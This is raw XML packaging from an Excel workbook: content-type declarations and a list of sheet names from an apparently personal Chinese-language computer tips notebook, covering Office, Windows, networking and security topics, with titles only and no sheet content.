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71.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet82.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing97.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet13.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drawings/drawing39.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing86.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64.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing75.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/xl/drawings/drawing2.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing53.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet3.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet98.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet117.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing42.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet87.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet106.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing20.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing31.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing102.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet29.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet76.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet18.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet54.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet65.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet120.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet43.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet90.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Default Extension="png" ContentType="image/png"/>
  <Override PartName="/xl/drawings/drawing69.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet32.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing7.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing58.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet8.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet21.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing18.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing36.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing47.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing65.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Default Extension="emf" ContentType="image/x-emf"/>
  <Override PartName="/xl/drawings/drawing83.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing94.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25.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing43.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing54.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing72.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing90.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing107.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/>
  <Override PartName="/xl/worksheets/sheet99.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet107.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet118.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing14.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing32.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing61.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet59.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet77.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet88.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet114.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Default Extension="gif" ContentType="image/gif"/>
  <Override PartName="/xl/drawings/drawing21.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing50.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing103.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/calcChain.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.calcChain+xml"/>
  <Override PartName="/xl/worksheets/sheet19.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet48.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet66.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet95.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet103.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing10.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet26.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet37.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet55.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet73.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet84.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet110.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet121.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/pivotCache/pivotCacheRecords1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivotCacheRecords+xml"/>
  <Override PartName="/xl/drawings/drawing99.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+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worksheets/sheet91.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing59.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing88.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+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drawings/drawing66.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing77.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing95.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Override PartName="/xl/drawings/drawing55.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing84.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing108.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worksheets/sheet119.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Override PartName="/xl/drawings/drawing62.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing73.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing91.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet89.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet108.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing22.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing33.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing51.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing80.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing104.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worksheets/sheet78.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet96.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet115.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing11.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing40.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet38.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet67.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet85.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet104.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet122.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing100.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+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Override PartName="/xl/worksheets/sheet74.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet92.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet111.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing89.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet16.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet34.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Override PartName="/xl/worksheets/sheet81.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet100.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing9.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing78.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet23.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet41.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet70.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing38.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing49.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing67.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing85.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing96.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet6.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet12.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet30.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/pivotTables/pivotTable1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivotTable+xml"/>
  <Override PartName="/xl/drawings/drawing5.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Override PartName="/xl/drawings/drawing27.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing45.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing56.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing74.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing92.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing109.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet109.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing16.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing34.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing63.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing81.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet116.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing23.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing41.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing52.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing70.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing105.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet68.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet79.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet97.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet105.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/pivotCache/pivotCacheDefinition1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivotCacheDefinition+xml"/>
  <Override PartName="/xl/drawings/drawing12.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing30.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet28.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet39.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet57.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet75.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet86.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet112.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet123.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing101.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet17.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet46.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet64.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet93.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet101.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet53.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing68.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing79.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet42.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/drawings/drawing6.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing57.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46.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing93.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing35.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing82.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing106.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing13.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing24.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing60.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing71.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet69.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worksheets/sheet94.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet113.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/sharedStrings.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml"/>
  <Override PartName="/xl/worksheets/sheet36.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet83.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet102.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet25.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/worksheets/sheet72.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.printerSettings"/>
  <Override PartName="/xl/drawings/drawing87.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing98.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/worksheets/sheet14.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drawings/drawing29.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/drawing76.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hidePivotFieldList="1" defaultThemeVersion="124226"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="96" windowWidth="15576" windowHeight="9816" tabRatio="841" firstSheet="2" activeTab="10"/>
  </bookViews>
  <sheets>
    <sheet name="分类" sheetId="129" r:id="rId1"/>
    <sheet name="contents" sheetId="1" r:id="rId2"/>
    <sheet name="blank" sheetId="46" r:id="rId3"/>
    <sheet name="dreamweaver基础" sheetId="139" r:id="rId4"/>
    <sheet name="flash 时间轴" sheetId="138" r:id="rId5"/>
    <sheet name="绘制等轴侧图形" sheetId="140" r:id="rId6"/>
    <sheet name="CAD tips" sheetId="135" r:id="rId7"/>
    <sheet name="数据透视表" sheetId="126" r:id="rId8"/>
    <sheet name="电脑维护" sheetId="134" r:id="rId9"/>
    <sheet name="数组公式" sheetId="132" r:id="rId10"/>
    <sheet name="VF" sheetId="131" r:id="rId11"/>
    <sheet name="Delphi " sheetId="130" r:id="rId12"/>
    <sheet name="CSS样式" sheetId="128" r:id="rId13"/>
    <sheet name="HTML文档" sheetId="127" r:id="rId14"/>
    <sheet name="word中英文混排的技巧" sheetId="125" r:id="rId15"/>
    <sheet name="～$文档" sheetId="124" r:id="rId16"/>
    <sheet name="将Word变为无所不能的播放器" sheetId="123" r:id="rId17"/>
    <sheet name="网络硬件" sheetId="122" r:id="rId18"/>
    <sheet name="宽带路由器设置" sheetId="121" r:id="rId19"/>
    <sheet name="Modem网络连接" sheetId="120" r:id="rId20"/>
    <sheet name="常见故障解决记录与技巧" sheetId="119" r:id="rId21"/>
    <sheet name="软件工具分类" sheetId="118" r:id="rId22"/>
    <sheet name="系统小工具" sheetId="27" r:id="rId23"/>
    <sheet name="DOS、系统提示符、windows PE" sheetId="117" r:id="rId24"/>
    <sheet name="软件是如何被破解的" sheetId="114" r:id="rId25"/>
    <sheet name="虚拟virtual" sheetId="104" r:id="rId26"/>
    <sheet name="远程控制 远程桌面和远程协助" sheetId="103" r:id="rId27"/>
    <sheet name="低格、高格、快格的区别" sheetId="102" r:id="rId28"/>
    <sheet name="常用cmd网络命令的用法" sheetId="70" r:id="rId29"/>
    <sheet name="Command" sheetId="100" r:id="rId30"/>
    <sheet name="shortcut key" sheetId="97" r:id="rId31"/>
    <sheet name="打造三合一安装光盘" sheetId="96" r:id="rId32"/>
    <sheet name="杀毒软件如何辨忠奸" sheetId="94" r:id="rId33"/>
    <sheet name="硬盘分区、数据丢失、恢复的经历" sheetId="93" r:id="rId34"/>
    <sheet name="程序设计基础" sheetId="92" r:id="rId35"/>
    <sheet name="病毒修复、删除、隔离" sheetId="91" r:id="rId36"/>
    <sheet name="网络的安全性" sheetId="90" r:id="rId37"/>
    <sheet name="防火墙" sheetId="89" r:id="rId38"/>
    <sheet name="是否有毒最关注的三大件" sheetId="88" r:id="rId39"/>
    <sheet name="什么情况下适合修复系统而不是重装" sheetId="87" r:id="rId40"/>
    <sheet name="电脑死机原因种种" sheetId="86" r:id="rId41"/>
    <sheet name="蓝屏并自动分析可能故障原因" sheetId="85" r:id="rId42"/>
    <sheet name="在纯DOS模式下杀毒" sheetId="84" r:id="rId43"/>
    <sheet name="高级启动" sheetId="83" r:id="rId44"/>
    <sheet name="MS操作系统各版本介绍" sheetId="82" r:id="rId45"/>
    <sheet name="双系统启动顺序" sheetId="81" r:id="rId46"/>
    <sheet name="操作系统原理" sheetId="78" r:id="rId47"/>
    <sheet name="可启动光盘 硬盘 恢复盘 启动盘" sheetId="76" r:id="rId48"/>
    <sheet name="恢复win7的quick launch" sheetId="74" r:id="rId49"/>
    <sheet name="黑客必学的六条系统命令" sheetId="72" r:id="rId50"/>
    <sheet name="雨林木风 WinXP SP2 安装" sheetId="71" r:id="rId51"/>
    <sheet name="XP安装" sheetId="69" r:id="rId52"/>
    <sheet name="手机里暗藏的十大秘密" sheetId="68" r:id="rId53"/>
    <sheet name="快速格式化和普通格式化有什么不同 " sheetId="67" r:id="rId54"/>
    <sheet name="电脑不启动故障诊治全攻略" sheetId="66" r:id="rId55"/>
    <sheet name="无敌删除命令" sheetId="64" r:id="rId56"/>
    <sheet name="实现WORD双面打印的简便方法" sheetId="63" r:id="rId57"/>
    <sheet name="VF主程序设计" sheetId="62" r:id="rId58"/>
    <sheet name="数据的类型" sheetId="61" r:id="rId59"/>
    <sheet name="对象的属性、事件、方法" sheetId="60" r:id="rId60"/>
    <sheet name="form" sheetId="59" r:id="rId61"/>
    <sheet name="VFP 6.0文件类型" sheetId="58" r:id="rId62"/>
    <sheet name="软件下载、安装、运行、卸载" sheetId="56" r:id="rId63"/>
    <sheet name="注册表" sheetId="53" r:id="rId64"/>
    <sheet name="驱动(driver)" sheetId="52" r:id="rId65"/>
    <sheet name="文件关联、默认程序、打开方式" sheetId="51" r:id="rId66"/>
    <sheet name="系统瘦身和清理" sheetId="50" r:id="rId67"/>
    <sheet name="丈量字符的尺寸" sheetId="49" r:id="rId68"/>
    <sheet name="计算机十二种常用密码破解法" sheetId="48" r:id="rId69"/>
    <sheet name="极点五笔" sheetId="40" r:id="rId70"/>
    <sheet name="定时开关机" sheetId="42" r:id="rId71"/>
    <sheet name="ARP欺骗与防止" sheetId="41" r:id="rId72"/>
    <sheet name="如何读取损坏光盘中的文件" sheetId="39" r:id="rId73"/>
    <sheet name="硅胶和导热硅脂" sheetId="37" r:id="rId74"/>
    <sheet name="计划任务程序" sheetId="36" r:id="rId75"/>
    <sheet name="网络基础" sheetId="34" r:id="rId76"/>
    <sheet name="Excel函数" sheetId="16" r:id="rId77"/>
    <sheet name="Excel基础" sheetId="33" r:id="rId78"/>
    <sheet name="word Excel中的超链接" sheetId="32" r:id="rId79"/>
    <sheet name="word基础" sheetId="31" r:id="rId80"/>
    <sheet name="页面布局纵横" sheetId="30" r:id="rId81"/>
    <sheet name="保护页眉" sheetId="29" r:id="rId82"/>
    <sheet name="合并多个word文档" sheetId="28" r:id="rId83"/>
    <sheet name="修改注册表激活Administrator帐户" sheetId="2" r:id="rId84"/>
    <sheet name="Internet connection diagram" sheetId="5" r:id="rId85"/>
    <sheet name="计算机相关单位" sheetId="6" r:id="rId86"/>
    <sheet name="忘记自动登录密码" sheetId="8" r:id="rId87"/>
    <sheet name="ABC帐户只能在规定时间内登录" sheetId="10" r:id="rId88"/>
    <sheet name="禁止特定软件在另外一个帐户中运行" sheetId="9" r:id="rId89"/>
    <sheet name="帐户基础" sheetId="11" r:id="rId90"/>
